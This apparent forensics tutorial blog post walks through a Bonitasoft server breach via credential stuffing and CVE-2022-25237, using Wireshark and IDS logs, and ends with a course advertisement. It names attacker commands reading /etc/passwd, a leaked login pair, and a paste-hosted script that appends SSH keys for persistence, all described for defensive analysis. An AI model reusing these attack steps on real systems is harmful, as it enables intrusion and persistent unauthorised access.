Today we are going to learn more about a branch of digital forensics that focuses on networks, which is Network Forensics. This field often contains a wealth of valuable evidence. Even though skilled attackers may evade endpoint controls, active network captures are harder to hide. Many of the attacker’s actions generate traffic that is recorded. Intrusion detection and prevention systems (IDS/IPS) can also surface malicious activity quickly, although not every organization deploys them. In this exercise you will see what can be extracted from IDS/IPS logs and a packet capture during a network forensic analysis.

The incident we will investigate today involved a credential-stuffing attempt followed by exploitation of CVE-2022-25237. The attacker abused an API to run commands and establish persistence. Below are the details and later a timeline of the attack.

Intro

Our subject is a fast-growing startup that uses a business management platform. Documentation for that platform is limited, and the startup administrators have not followed strong security practices. For this exercise we act as the security team. Our objective is to confirm the compromise using network packet captures (PCAP) and exported security logs.

We obtained an archive containing the artifacts needed for the investigation. It includes a .pcap network traffic file and a .json file with security events. Wireshark will be our primary analysis tool.

network artifacts for the analysis

Analysis

Defining Key IP Addresses

The company suspects its management platform was breached. To identify which platform and which hosts are involved, we start with the pcap file. In Wireshark, view the TCP endpoints from the Statistics menu and sort by packet count to see which IP addresses dominate the capture.

endpoints in wireshark with higher reception

This quickly highlights the IP address 172.31.6.44 as a major recipient of traffic. The traffic to that host uses ports 37022, 8080, 61254, 61255, and 22. Common service associations for these ports are: 8080 for HTTP, 22 for SSH, and 37022 as an arbitrary TCP data port that the environment is using.

When you identify heavy talkers in a capture, export their connection lists and timestamps immediately. That gives you a focused subset to work from and preserves the context of later findings.

Analyzing HTTP Traffic

The port usage suggests the management platform is web-based. Filter HTTP traffic in Wireshark with http.request to inspect client requests. The first notable entry is a GET request whose URL and headers match Bonitasoft’s platform, showing the company uses Bonitasoft for business management.

http traffic that look like brute force

Below that GET request you can see a series of authentication attempts (POST requests) originating from 156.146.62.213. The login attempts include usernames that reveal the attacker has done corporate OSINT and enumerated staff names.

The credentials used for the attack are not generic wordlist guesses, instead the attacker tries a focused set of credentials. That behavior is consistent with credential stuffing: the attacker uses previously leaked username/password pairs (often from other breaches) and tries them against this service, typically automated and sometimes distributed via a botnet to blend with normal traffic.

credentil stuffing spotted

A credential-stuffing event alone does not prove a successful compromise. The next step is to check whether any of the login attempts produced a successful authentication. Before doing that, we review the IDS/IPS alerts.

Finding the CVE

To inspect the JSON alert file in a shell environment, format it with jq and then see what’s inside. Here is how you can make the json output easier to read:

bash$ > cat alerts.json | jq .

reading alert log file

Obviously, the file will be too big, so we will narrow it down to indicators such as CVE:

bash$ > cat alerts.json | jq .

grepping cves in the alert log file

Security tools often map detected signatures to known CVE identifiers. In our case, alert data and correlation with the observed HTTP requests point to repeated attempts to exploit CVE-2022-25237, a vulnerability affecting Bonita Web 2021.2. The exploit abuses insufficient validation in the RestAPIAuthorizationFilter (or related i18n translation logic). By appending crafted data to a URL, an attacker can reach privileged API endpoints, potentially enabling remote code execution or privilege escalation.

cve 2022-25237 information

Now we verify whether exploitation actually succeeded.

Exploitation

To find successful authentications, filter responses with:

http.response.code >= 200 and http.response.code < 300 and ip.addr == 172.31.6.44

filtering http responses with successful authentication

Among the successful responses, HTTP 204 entries stand out because they are less common than HTTP 200. If we follow the HTTP stream for a 204 response, the request stream shows valid credentials followed immediately by a 204 response and cookie assignment. That means he successfully logged in. This is the point where the attacker moves from probing to interacting with privileged endpoints.

finding a successful authentication

After authenticating, the attacker targets the API to exploit the vulnerability. In the traffic we can see an upload of rce_api_extension.zip, which enables remote code execution. Later this zip file will be deleted to remove unnecessary traces.

finding the api abuse after the authentication
attacker uploaded a zip file to abuse the api

Following the upload, we can observe commands executed on the server. The attacker reads /etc/passwd and runs whoami. In the output we see access to sensitive system information.

reading the passwd file
the attacker assessing his privileges

During a forensic investigation you should extract the uploaded files from the capture or request the original file from the source system (if available). Analyzing the uploaded code is essential to understand the artifact of compromise and to find indicators of lateral movement or backdoors

Persistence

After initial control, attackers typically establish persistence. In this incident, all attacker activity is over HTTP, so we follow subsequent HTTP requests to find persistence mechanisms.

the attacker establishes persistence with pastes.io

The attacker downloads a script hosted on a paste service (pastes.io), named bx6gcr0et8, which then retrieves another snippet hffgra4unv, appending its output to /home/ubuntu/.ssh/authorized_keys when executed. The attacker restarts SSH to apply the new key.

reading the bash script used to establish persistence

A few lines below we can see that the first script was executed via bash, completing the persistence setup.

the persistence script is executed

Appending keys to authorized_keys allows SSH access for the attacker’s key pair and doesn’t require a password. It’s a stealthy persistence technique that avoids adding new files that antivirus might flag. In this case the attacker relied on built-in Linux mechanisms rather than installing malware.

When you find modifications to authorized_keys, pull the exact key material from the capture and compare it with known attacker keys or with subsequent SSH connection fingerprints. That helps attribute later logins to this initial persistence action.

Mittre SSH Authorized Keys information

Post-Exploitation

Further examination of the pcap shows the server reaching out to Ubuntu repositories to download a .deb package that contains Nmap. 

attacker downloads a deb file with nmap
attacker downloads a deb file with nmap

Shortly after SSH access is obtained, we see traffic from a second IP address, 95.181.232.30, connecting over port 22. Correlating timestamps shows the command to download the .deb package was issued from that SSH session. Once Nmap is present, the attacker performs a port scan of 34.207.150.13.

attacker performs nmap scan

This sequence, adding an SSH key, then using SSH to install reconnaissance tools and scan other hosts fits a common post-exploitation pattern. Hackers establish persistent access, stage tools, and then enumerate the network for lateral movement opportunities.

During forensic investigations, save the sequence of timestamps that link file downloads, package installation, and scanning activity. Those correlations are important for incident timelines and for identifying which sessions performed which actions.

Timeline

At the start, the attacker attempted credential stuffing against the management server. Successful login occurred with the credentials seb.broom / g0vernm3nt. After authentication, the attacker exploited CVE-2022-25237 in Bonita Web 2021.2 to reach privileged API endpoints and uploaded rce_api_extension.zip. They then executed commands such as whoami and cat /etc/passwd to confirm privileges and enumerate users.

The attacker removed rce_api_extension.zip from the web server to reduce obvious traces. Using pastes.io from IP 138.199.59.221, the attacker executed a bash script that appended data to /home/ubuntu/.ssh/authorized_keys, enabling SSH persistence (MITRE ATT&CK: SSH Authorized Keys, T1098.004). Shortly after persistence was established, an SSH connection from 95.181.232.30 issued commands to download a .deb package containing Nmap. The attacker used Nmap to scan 34.207.150.13 and then terminated the SSH session.

Conclusion

During our network forensics exercise we saw how packet captures and IDS/IPS logs can reveal the flow of a compromise, from credential stuffing, through exploitation of a web-application vulnerability, to command execution and persistence via SSH keys. We practiced using Wireshark to trace HTTP streams, observed credential stuffing in action, and followed the attacker’s persistence mechanism.

Although our class focused on analysis, in real incidents you should always preserve originals and record every artifact with exact timestamps. Create cryptographic hashes of artifacts, maintain a chain of custody, and work only on copies. These steps protect the integrity of evidence and are essential if the incident leads to legal action.

For those of you interested in deepening your digital forensics skills, we will be running a practical SCADA forensics course soon in November. This intensive, hands-on course teaches forensic techniques specific to Industrial Control Systems and SCADA environments showing you how to collect and preserve evidence from PLCs, RTUs, HMIs and engineering workstations, reconstruct attack chains, and identify indicators of compromise in OT networks. Its focus on real-world labs and breach simulations will make your CV stand out. Practical OT/SCADA skills are rare and highly valued, so completing a course like this is definitely going to make your CV stand out. 

We also offer digital forensics services for organizations and individuals. Contact us to discuss your case and which services suit your needs.

Learn more: https://hackersarise.thinkific.com/courses/scada-forensics

The post Network Forensics: Analyzing a Server Compromise (CVE-2022-25237) first appeared on Hackers Arise.

❌
❌